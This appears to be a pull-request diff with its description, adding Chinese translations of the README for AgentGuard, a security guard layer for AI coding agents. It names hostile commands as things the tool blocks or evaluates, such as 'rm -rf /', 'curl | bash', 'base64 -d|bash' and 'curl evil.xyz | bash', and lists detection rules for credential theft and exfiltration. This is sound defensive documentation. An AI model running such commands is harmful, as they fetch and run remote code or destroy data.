+> **基于 hooks 的自动守卫（第 1 层）** 目前适用于 Claude Code（`PreToolUse` / `PostToolUse`）和 OpenClaw（`before_tool_call` / `after_tool_call`）。两个平台通过统一的适配器抽象层复用同一套决策引擎。
+>
+> **OpenClaw 专属能力：** 在注册时自动扫描所有已加载插件，自动写入信任注册表，并通过 cron 支持每日安全巡检。
+
+## Hook 限制
+
+自动守卫 hooks（第 1 层）目前有以下限制：
+
+- **平台相关**：hooks 依赖 Claude Code 的 `PreToolUse` / `PostToolUse` 事件或 OpenClaw 的 `before_tool_call` / `after_tool_call` 插件钩子，但两者共享同一套决策引擎
+- **默认拒绝策略**：首次使用时，部分命令可能触发确认提示。内置安全命令白名单（如 `ls`、`echo`、`pwd`、`git status`）可减少误报
+- **技能来源追踪**：
+- *Claude Code*：通过分析会话 transcript 推断哪个技能发起了动作（启发式判断，不保证 100% 精确）
+- *OpenClaw*：使用注册阶段建立的 tool→plugin 映射（更可靠）
+- **无法拦截技能安装本身**：hooks 只能拦截技能加载之后发起的工具调用（如 Bash、Write、WebFetch），无法阻止 Skill 工具本身被调用
+- **OpenClaw 自动扫描时序**：插件会在 AgentGuard 注册完成后异步扫描。若启动后立刻触发非常快的工具调用，可能发生在扫描尚未结束之前
+
+## 路线图
+
+### v1.1 — 检测增强
+- [x] 将扫描规则扩展到 Markdown 文件（检测恶意 `SKILL.md`）
+- [x] Base64 载荷解码后重新扫描
+- [x] 新增规则：TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING
+- [x] 引入安全命令白名单，降低 hooks 误报
+- [x] 插件清单（`.claude-plugin/`），支持一步安装
+
+### v1.5 — 每日巡检
+- [x] `patrol run`，执行 8 项安全状态评估
+- [x] `patrol setup`，配置带时区和通知的 OpenClaw cron 任务
+- [x] `patrol status`，查看上次结果和计划概览
+- [x] 技能/插件完整性验证（哈希漂移检测）
+- [x] 密钥暴露扫描（私钥、助记词、AWS Key、GitHub Token）
+- [x] 网络暴露与防火墙检查
+- [x] 审计日志模式分析（重复拒绝、外传尝试）
+
+### v1.6 — Agent 健康体检
+- [x] `checkup`，6 维度安全健康评估
+- [x] 带龙虾吉祥物的可视化 HTML 报告（4 个等级）
+- [x] 动画分数仪表盘、维度卡片、可展开问题详情
+- [x] 评分算法：代码安全、信任卫生、运行时防御、密钥保护、Web3 盾牌、配置姿态
+- [x] 集成高级功能升级 CTA
+
+### v2.0 — 多平台
+- [x] OpenClaw gateway 插件集成
+- [x] `before_tool_call` / `after_tool_call` hook 接线
+- [x] 多平台适配器抽象层（Claude Code + OpenClaw）
+- [x] 在 OpenClaw 注册时自动扫描插件
+- [x] tool→plugin 映射，用于追踪发起技能
+- [x] 自动将扫描结果写入信任注册表
+- [ ] OpenAI Codex CLI sandbox 适配器
+- [ ] 跨平台联邦信任注册表
+
+### v3.0 — 生态
+- [ ] 威胁情报源（共享 C2 IP/域名封锁列表）
+- [ ] 技能市场自动扫描流水线
+- [ ] VS Code 扩展，提供 IDE 原生安全能力
+- [ ] 社区规则贡献（开放规则格式）
+
+## OpenClaw 集成
+
+AgentGuard 为 OpenClaw 提供更深度的集成，包括自动插件扫描、信任管理和每日安全巡检。
+
+<details>
+<summary><b>工作原理</b></summary>
+
+当 AgentGuard 作为 OpenClaw 插件注册时：
+
+```text
+┌─────────────────────────────────────────────────────────────────┐
+│  OpenClaw loads AgentGuard plugin                               │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  AgentGuard scans all loaded plugins (async, non-blocking)      │
+│  • Reads plugin source from registry                            │
+│  • Runs 24 static analysis rules                                │
+│  • Calculates artifact hash                                     │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  For each plugin:                                               │
+│  • Determine trust level (untrusted/restricted/trusted)         │
+│  • Infer capabilities from tools + scan results                 │
+│  • Register to AgentGuard trust registry                        │
+│  • Map tool names → plugin ID                                   │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  On every tool call:                                            │
+│  • Look up plugin from tool name                                │
+│  • Check plugin trust level & capabilities                      │
+│  • Evaluate action against security policies                    │
+│  • Allow / Deny / Log                                           │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  Daily patrol (via cron):                                       │
+│  • Run 8 security checks against the environment                │
+│  • Verify skill integrity, detect secrets, audit logs           │
+│  • Generate report (PASS / WARN / FAIL)                         │
+│  • Send notifications (Telegram / Discord / Signal)             │
+└─────────────────────────────────────────────────────────────────┘
+```
+
+</details>
+
+<details>
+<summary><b>面向 OpenClaw 导出的工具</b></summary>
+
+```typescript
+import {
+  registerOpenClawPlugin,
+  getPluginIdFromTool,
+  getPluginScanResult,
+} from '@goplus/agentguard';
+
+// 获取某个工具是由哪个插件注册的
+const pluginId = getPluginIdFromTool('browser');
+// → 'my-browser-plugin'
+
+// 获取缓存的扫描结果
+const scanResult = getPluginScanResult('my-browser-plugin');
+// → { riskLevel: 'low', riskTags: [] }
+```
+
+</details>
+
+## 文档
+
+- [Security Policy](../SECURITY-POLICY.md) — 统一安全规则与策略参考
+- [MCP Server Setup](../mcp-server.md) — 以 MCP Server 方式运行
+- [SDK Usage](../sdk.md) — 作为 TypeScript/JavaScript 库使用
+- [Trust Management](../trust-cli.md) — 管理技能信任等级和能力预设
+- [GoPlus API (Web3)](../goplus-api.md) — GoPlus 增强的 Web3 安全能力
+- [Architecture](../architecture.md) — 项目结构与测试说明
+
+## 许可证
+
+[MIT](../../LICENSE)
+
+## 贡献
+
+欢迎贡献。详情见 [CONTRIBUTING.md](../../CONTRIBUTING.md)。
+
+如果你发现了安全漏洞，请查看 [SECURITY.md](../../SECURITY.md)。
+
+由 [GoPlus Security](https://gopluslabs.io) 构建。

--- a/docs/i18n/README.zh-Hans.md
+++ b/docs/i18n/README.zh-Hans.md
@@ -1,3 +1,4 @@
+<!-- synced with README.md as of commit b3b8d0f -->
 # GoPlus AgentGuard
 
 [English](../../README.md) | **简体中文** | [繁體中文](README.zh-Hant.md) | [日本語](README.ja.md)

--- a/docs/i18n/README.zh-Hant.md
+++ b/docs/i18n/README.zh-Hant.md
@@ -1,0 +1,393 @@
+# GoPlus AgentGuard
+
+[English](../../README.md) | [简体中文](README.zh-Hans.md) | **繁體中文** | [日本語](README.ja.md)
+
+> 本文件為英文 README 的繁體中文譯本。若與英文版有差異，請以英文版為準。
+
+## 為什麼選擇 AgentGuard？
+
+AI 編碼代理可以執行任意命令、讀取任意檔案、安裝任意技能，但通常沒有任何安全審查。風險是真實存在的：
+
+- **惡意技能** 可能隱藏後門、竊取憑證或外傳資料
+- **提示注入** 可能誘導你的代理執行破壞性命令
+- **來自網際網路的未驗證程式碼** 可能包含錢包盜取邏輯或鍵盤側錄器
+
+**AgentGuard 是面向 AI 代理的即時安全層。** 它會自動掃描新技能，在危險動作執行前攔截，執行每日安全巡檢，並追蹤究竟是哪個技能發起了某個動作。一次安裝，持續防護。
+
+## 它能做什麼
+
+**第 1 層：自動守衛（hooks）**。安裝一次，持續保護。
+- 阻止 `rm -rf /`、fork bomb、`curl | bash` 等破壞性命令
+- 阻止寫入 `.env`、`.ssh/`、憑證檔等敏感位置
+- 偵測向 Discord、Telegram、Slack webhook 的資料外傳
+- 追蹤動作由哪個技能發起，方便追責惡意技能
+
+**第 2 層：深度掃描（skill）**。按需執行的安全稽核，內建 24 條檢測規則。
+- 會話啟動時**自動掃描新技能**，在執行前攔截惡意內容
+- 靜態分析金鑰、後門、混淆、提示注入等風險
+- 支援 Web3 場景：錢包盜取、無限授權、重入、代理升級等風險
+- 提供基於能力邊界的技能信任登錄表
+
+**第 3 層：每日巡檢（OpenClaw）**。自動化安全狀態評估。
+- 按排程執行 8 項綜合安全檢查
+- 偵測技能遭竄改、金鑰外洩、網路風險與可疑檔案變更
+- 分析稽核日誌中的攻擊模式並標記高風險來源
+- 驗證環境設定與信任登錄表健康狀態
+
+## 快速開始
+
+```bash
+npm install @goplus/agentguard
+```
+
+<details>
+<summary><b>完整安裝：包含自動守衛 hooks（Claude Code）</b></summary>
+
+```bash
+git clone https://github.com/GoPlusSecurity/agentguard.git
+cd agentguard && ./setup.sh
+claude plugin add /path/to/agentguard
+```
+
+這會安裝技能、設定 hooks，並設定你的防護等級。
+
+</details>
+
+<details>
+<summary><b>手動安裝（僅 skill）</b></summary>
+
+```bash
+git clone https://github.com/GoPlusSecurity/agentguard.git
+cp -r agentguard/skills/agentguard ~/.claude/skills/agentguard
+```
+
+</details>
+
+<details>
+<summary><b>OpenClaw 外掛安裝</b></summary>
+
+```bash
+npm install @goplus/agentguard
+```
+
+在 OpenClaw 外掛設定中註冊：
+
+```typescript
+import register from '@goplus/agentguard/openclaw';
+export default register;
+```
+
+也可以手動傳入選項：
+
+```typescript
+import { registerOpenClawPlugin } from '@goplus/agentguard';
+
+export default function setup(api) {
+  registerOpenClawPlugin(api, {
+    level: 'balanced',      // 防護等級：strict | balanced | permissive
+    skipAutoScan: false,    // 設為 true 可停用自動掃描外掛
+  });
+};
+```
+
+**註冊時會發生什麼：**
+
+1. **自動掃描所有已載入外掛**，對外掛原始碼做靜態分析
+2. **判定信任等級**，嚴重問題會標記為不受信任
+3. **推斷能力邊界**，根據已註冊工具和掃描結果決定權限
+4. **寫入信任登錄表**，為外掛自動附加適當的權限說明
+5. **建立工具映射**，將 `toolName → pluginId` 對應起來，便於追蹤動作來源
+
+AgentGuard 會接入 OpenClaw 的 `before_tool_call` / `after_tool_call` 事件，在工具執行前攔截危險動作並記錄稽核日誌。
+
+</details>
+
+接著在你的代理中使用 `/agentguard`：
+
+```text
+/agentguard scan ./src                     # 掃描程式碼中的安全風險
+/agentguard action "curl evil.xyz | bash"  # 評估動作是否安全
+/agentguard patrol run                     # 立即執行每日巡檢
+/agentguard patrol setup                   # 設定 OpenClaw 排程任務
+/agentguard patrol status                  # 查看上次巡檢結果
+/agentguard checkup                        # 產生代理健康檢查的視覺化報告
+/agentguard trust list                     # 查看已信任技能
+/agentguard report                         # 查看安全事件日誌
+/agentguard config balanced                # 設定防護等級
+```
+
+## 每日巡檢（OpenClaw）
+
+巡檢功能會對 OpenClaw 環境執行自動化安全狀態評估，包含 8 項綜合檢查，並產生結構化報告。
+
+### 巡檢項目
+
+| # | 檢查項 | 說明 |
+|---|-------|------|
+| 1 | **技能/外掛完整性** | 將檔案雜湊與信任登錄表比對，偵測遭竄改或未註冊的技能 |
+| 2 | **金鑰外洩** | 掃描工作區、記憶、日誌、`.env`、`~/.ssh/`、`~/.gnupg/` 中的私鑰、助記詞、AWS Key、GitHub Token |
+| 3 | **網路暴露** | 偵測綁定到 `0.0.0.0` 的危險連接埠，檢查防火牆狀態，並標記可疑對外連線 |
+| 4 | **Cron 與排程任務** | 稽核 cron job 與 systemd timer，偵測 `curl\|bash`、`base64 -d\|bash` 等下載即執行模式 |
+| 5 | **檔案系統變更（24h）** | 找出最近修改的檔案，對其執行 24 條規則掃描，並檢查關鍵檔案權限與新增可執行檔 |
+| 6 | **稽核日誌分析（24h）** | 標記被拒絕 3 次以上的技能、CRITICAL 事件、資料外傳嘗試與提示注入命中 |
+| 7 | **環境與設定** | 驗證防護等級、GoPlus API Key 設定與設定基線完整性 |
+| 8 | **信任登錄表健康度** | 標記過期證明、陳舊信任項、已安裝但未信任的技能，以及過度授權的條目 |
+
+### 用法
+
+```bash
+# 立即執行全部 8 項檢查
+/agentguard patrol run
+
+# 設定每日定時巡檢（預設 UTC 03:00）
+/agentguard patrol setup
+
+# 查看上次巡檢結果與目前排程
+/agentguard patrol status
+```
+
+### 巡檢報告
+
+每次巡檢都會產生一個總體狀態：
+
+| 狀態 | 含義 |
+|------|------|
+| **PASS** | 僅發現低/中風險問題 |
+| **WARN** | 偵測到 HIGH 等級問題 |
+| **FAIL** | 偵測到 CRITICAL 等級問題 |
+
+報告會包含每個檢查項的狀態、問題數量、詳細發現與可執行建議。結果也會寫入 `~/.agentguard/audit.jsonl`。
+
+### 設定項
+
+`patrol setup` 會建立一個 OpenClaw cron 任務，支援：
+- **Timezone**，預設 UTC
+- **Schedule**，預設 `0 3 * * *`（每日 03:00）
+- **Notifications**，可選 Telegram、Discord、Signal 通知
+
+> **注意：** 巡檢功能依賴 OpenClaw 環境。非 OpenClaw 場景建議使用 `/agentguard scan` 和 `/agentguard report` 進行手動檢查。
+
+## Agent 健康檢查 🦞
+
+替你的代理做一次完整健檢。`checkup` 會從 6 個維度評估代理安全狀況，並產生一份視覺化 HTML 報告，內含會隨健康狀態改變的龍蝦吉祥物。
+
+```text
+/agentguard checkup
+```
+
+### 檢查內容
+
+| 維度 | 評估內容 |
+|------|----------|
+| **程式碼安全** | 所有已安裝技能的掃描結果（24 條檢測規則） |
+| **信任衛生** | 信任登錄表健康度，包括過期、陳舊、未註冊、過度授權條目 |
+| **執行期防禦** | 稽核日誌分析，包括攔截威脅、攻擊模式、拒絕/確認比率 |
+| **金鑰保護** | 憑證外洩，包括檔案權限、環境變數、硬編碼密鑰 |
+| **Web3 盾牌** | Web3 風險，包括錢包盜取、無限授權、GoPlus API 狀態 |
+| **設定姿態** | 防護等級、守衛 hooks、自動掃描與巡檢歷史 |
+
+### 龍蝦等級
+
+你的代理健康狀態會以龍蝦形象呈現：
+
+| 分數 | 等級 | 龍蝦形象 | 文案 |
+|------|------|---------|------|
+| 90–100 | **S** | 💪 戴皇冠和墨鏡的肌肉龍蝦 | *"Your agent is JACKED!"* |
+| 70–89 | **A** | 🛡️ 拿著盾牌的健康龍蝦 | *"Looking solid!"* |
+| 50–69 | **B** | ☕ 拿著咖啡、正在流汗的疲憊龍蝦 | *"Needs a workout..."* |
+| 0–49 | **F** | 🚨 綁著繃帶、含著體溫計的病弱龍蝦 | *"CRITICAL CONDITION!"* |
+
+報告是一個獨立 HTML 檔案，會自動在瀏覽器中開啟，包含深色主題、動畫分數儀表、可展開問題詳情與可執行建議。
+
+## 防護等級
+
+| 等級 | 行為 |
+|------|------|
+| `strict` | 阻止所有有風險動作。任何危險或可疑命令都會被拒絕。 |
+| `balanced` | 阻止危險動作，對可疑動作要求確認。適合日常使用。**（預設）** |
+| `permissive` | 只阻止關鍵威脅。適合希望最小干擾的熟練使用者。 |
+
+## 檢測規則（24）
+
+| 類別 | 規則 | 嚴重等級 |
+|------|------|----------|
+| **執行** | SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER | HIGH-CRITICAL |
+| **金鑰** | READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_KEY_PATTERN, MNEMONIC_PATTERN | MEDIUM-CRITICAL |
+| **外傳** | NET_EXFIL_UNRESTRICTED, WEBHOOK_EXFIL | HIGH-CRITICAL |
+| **混淆** | OBFUSCATION, PROMPT_INJECTION | HIGH-CRITICAL |
+| **Web3** | WALLET_DRAINING, UNLIMITED_APPROVAL, DANGEROUS_SELFDESTRUCT, HIDDEN_TRANSFER, PROXY_UPGRADE, FLASH_LOAN_RISK, REENTRANCY_PATTERN, SIGNATURE_REPLAY | MEDIUM-CRITICAL |
+| **木馬與社工** | TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING | MEDIUM-CRITICAL |
+
+## 試試看
+
+掃描倉庫內附帶的漏洞示範專案：
+
+```text
+/agentguard scan examples/vulnerable-skill
+```
+
+預期結果：風險等級應為 **CRITICAL**，並在 JavaScript、Solidity 與 Markdown 檔案中命中多條規則。
+
+## 相容性
+
+GoPlus AgentGuard 遵循 [Agent Skills](https://agentskills.io) 開放標準：
+
+| 平台 | 支援情況 | 功能 |
+|------|----------|------|
+| **Claude Code** | 完整支援 | Skill + hooks 自動守衛，基於 transcript 的技能來源追蹤 |
+| **OpenClaw** | 完整支援 | 外掛 hooks + **載入時自動掃描** + tool→plugin 映射 + **每日巡檢** |
+| **OpenAI Codex CLI** | Skill | scan/action/trust 指令 |
+| **Gemini CLI** | Skill | scan/action/trust 指令 |
+| **Cursor** | Skill | scan/action/trust 指令 |
+| **GitHub Copilot** | Skill | scan/action/trust 指令 |
+
+> **基於 hooks 的自動守衛（第 1 層）** 目前適用於 Claude Code（`PreToolUse` / `PostToolUse`）與 OpenClaw（`before_tool_call` / `after_tool_call`）。兩個平台透過統一的適配器抽象層共用同一套決策引擎。
+>
+> **OpenClaw 專屬能力：** 在註冊時自動掃描所有已載入外掛，自動寫入信任登錄表，並透過 cron 支援每日安全巡檢。
+
+## Hook 限制
+
+自動守衛 hooks（第 1 層）目前有以下限制：
+
+- **平台相關**：hooks 依賴 Claude Code 的 `PreToolUse` / `PostToolUse` 事件或 OpenClaw 的 `before_tool_call` / `after_tool_call` 外掛鉤子，但兩者共用同一套決策引擎
+- **預設拒絕策略**：第一次使用時，部分命令可能觸發確認提示。內建安全命令白名單（如 `ls`、`echo`、`pwd`、`git status`）可降低誤報
+- **技能來源追蹤**：
+- *Claude Code*：透過分析會話 transcript 推斷哪個技能發起動作（啟發式判斷，不保證 100% 精確）
+- *OpenClaw*：使用註冊階段建立的 tool→plugin 映射（更可靠）
+- **無法攔截技能安裝本身**：hooks 只能攔截技能載入後發起的工具呼叫（如 Bash、Write、WebFetch），無法阻止 Skill 工具本身被調用
+- **OpenClaw 自動掃描時序**：外掛會在 AgentGuard 註冊完成後非同步掃描。若啟動後立刻觸發非常快的工具呼叫，可能發生在掃描尚未完成之前
+
+## 路線圖
+
+### v1.1 — 檢測增強
+- [x] 將掃描規則擴展到 Markdown 檔案（偵測惡意 `SKILL.md`）
+- [x] Base64 載荷解碼後重新掃描
+- [x] 新增規則：TROJAN_DISTRIBUTION, SUSPICIOUS_PASTE_URL, SUSPICIOUS_IP, SOCIAL_ENGINEERING
+- [x] 引入安全命令白名單，降低 hooks 誤報
+- [x] 外掛清單（`.claude-plugin/`），支援一步安裝
+
+### v1.5 — 每日巡檢
+- [x] `patrol run`，執行 8 項安全狀態評估
+- [x] `patrol setup`，設定帶時區與通知的 OpenClaw cron 任務
+- [x] `patrol status`，查看上次結果與排程概覽
+- [x] 技能/外掛完整性驗證（雜湊漂移檢測）
+- [x] 金鑰外洩掃描（私鑰、助記詞、AWS Key、GitHub Token）
+- [x] 網路暴露與防火牆檢查
+- [x] 稽核日誌模式分析（重複拒絕、外傳嘗試）
+
+### v1.6 — Agent 健康檢查
+- [x] `checkup`，6 維度安全健康評估
+- [x] 帶龍蝦吉祥物的視覺化 HTML 報告（4 個等級）
+- [x] 動畫分數儀表、維度卡片、可展開問題詳情
+- [x] 評分演算法：程式碼安全、信任衛生、執行期防禦、金鑰保護、Web3 盾牌、設定姿態
+- [x] 整合進階功能升級 CTA
+
+### v2.0 — 多平台
+- [x] OpenClaw gateway 外掛整合
+- [x] `before_tool_call` / `after_tool_call` hook 接線
+- [x] 多平台適配器抽象層（Claude Code + OpenClaw）
+- [x] 在 OpenClaw 註冊時自動掃描外掛
+- [x] tool→plugin 映射，用於追蹤發起技能
+- [x] 自動將掃描結果寫入信任登錄表
+- [ ] OpenAI Codex CLI sandbox 適配器
+- [ ] 跨平台聯邦信任登錄表
+
+### v3.0 — 生態
+- [ ] 威脅情報來源（共享 C2 IP/網域封鎖清單）
+- [ ] 技能市集自動掃描流程
+- [ ] VS Code 擴充套件，提供 IDE 原生安全能力
+- [ ] 社群規則貢獻（開放規則格式）
+
+## OpenClaw 整合
+
+AgentGuard 為 OpenClaw 提供更深入的整合，包括自動外掛掃描、信任管理與每日安全巡檢。
+
+<details>
+<summary><b>運作方式</b></summary>
+
+當 AgentGuard 作為 OpenClaw 外掛註冊時：
+
+```text
+┌─────────────────────────────────────────────────────────────────┐
+│  OpenClaw loads AgentGuard plugin                               │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  AgentGuard scans all loaded plugins (async, non-blocking)      │
+│  • Reads plugin source from registry                            │
+│  • Runs 24 static analysis rules                                │
+│  • Calculates artifact hash                                     │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  For each plugin:                                               │
+│  • Determine trust level (untrusted/restricted/trusted)         │
+│  • Infer capabilities from tools + scan results                 │
+│  • Register to AgentGuard trust registry                        │
+│  • Map tool names → plugin ID                                   │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  On every tool call:                                            │
+│  • Look up plugin from tool name                                │
+│  • Check plugin trust level & capabilities                      │
+│  • Evaluate action against security policies                    │
+│  • Allow / Deny / Log                                           │
+└─────────────────────────────────────────────────────────────────┘
+                              │
+                              ▼
+┌─────────────────────────────────────────────────────────────────┐
+│  Daily patrol (via cron):                                       │
+│  • Run 8 security checks against the environment                │
+│  • Verify skill integrity, detect secrets, audit logs           │
+│  • Generate report (PASS / WARN / FAIL)                         │
+│  • Send notifications (Telegram / Discord / Signal)             │
+└─────────────────────────────────────────────────────────────────┘
+```
+
+</details>
+
+<details>
+<summary><b>為 OpenClaw 匯出的工具</b></summary>
+
+```typescript
+import {
+  registerOpenClawPlugin,
+  getPluginIdFromTool,
+  getPluginScanResult,
+} from '@goplus/agentguard';
+
+// 取得某個工具是由哪個外掛註冊的
+const pluginId = getPluginIdFromTool('browser');
+// → 'my-browser-plugin'
+
+// 取得快取的掃描結果
+const scanResult = getPluginScanResult('my-browser-plugin');
+// → { riskLevel: 'low', riskTags: [] }
+```
+
+</details>
+
+## 文件
+
+- [Security Policy](../SECURITY-POLICY.md) — 統一安全規則與策略參考
+- [MCP Server Setup](../mcp-server.md) — 以 MCP Server 方式執行
+- [SDK Usage](../sdk.md) — 作為 TypeScript/JavaScript 函式庫使用
+- [Trust Management](../trust-cli.md) — 管理技能信任等級與能力預設
+- [GoPlus API (Web3)](../goplus-api.md) — GoPlus 強化的 Web3 安全能力
+- [Architecture](../architecture.md) — 專案結構與測試說明
+
+## 授權
+
+[MIT](../../LICENSE)
+
+## 貢獻
+
+歡迎貢獻。詳情請見 [CONTRIBUTING.md](../../CONTRIBUTING.md)。
+
+若你發現安全漏洞，請查看 [SECURITY.md](../../SECURITY.md)。
+
+由 [GoPlus Security](https://gopluslabs.io) 建構。

--- a/docs/i18n/README.zh-Hant.md
+++ b/docs/i18n/README.zh-Hant.md
@@ -1,3 +1,4 @@
+<!-- synced with README.md as of commit b3b8d0f -->
 # GoPlus AgentGuard
 
 [English](../../README.md) | [简体中文](README.zh-Hans.md) | **繁體中文** | [日本語](README.ja.md)


### PR DESCRIPTION
  ## Summary

  This PR adds multilingual README support to make AgentGuard more
  accessible to a broader developer audience.

  ### Changes

  - Add a dedicated directory for localized README files: `docs/i18n/`
  - Add Simplified Chinese translation: `docs/i18n/README.zh-Hans.md`
  - Add Traditional Chinese translation: `docs/i18n/README.zh-Hant.md`
  - Add Japanese translation: `docs/i18n/README.ja.md`
  - Add language navigation links to the main `README.md`
  - Update `CONTRIBUTING.md` with translation file naming and
  organization guidelines

  ## Why

  This project was shared with me through a community meetup, and while the English README is readable, it still creates friction for non-native English users during installation and initial evaluation.

  For security tools like AgentGuard, reducing that friction matters. A localized README helps users understand the project faster, install it more confidently, and evaluate its capabilities without relying on browser translation tools or external plugins.

  This PR aims to improve accessibility for users who are more comfortable reading Simplified Chinese, Traditional Chinese, or Japanese, while keeping the English README as the canonical source.

  ## Notes

  - English `README.md` remains the source of truth
  - Localized files are grouped under `docs/i18n/` to keep the
  repository root clean
  - The first batch of supported languages includes:
    - Simplified Chinese
    - Traditional Chinese
    - Japanese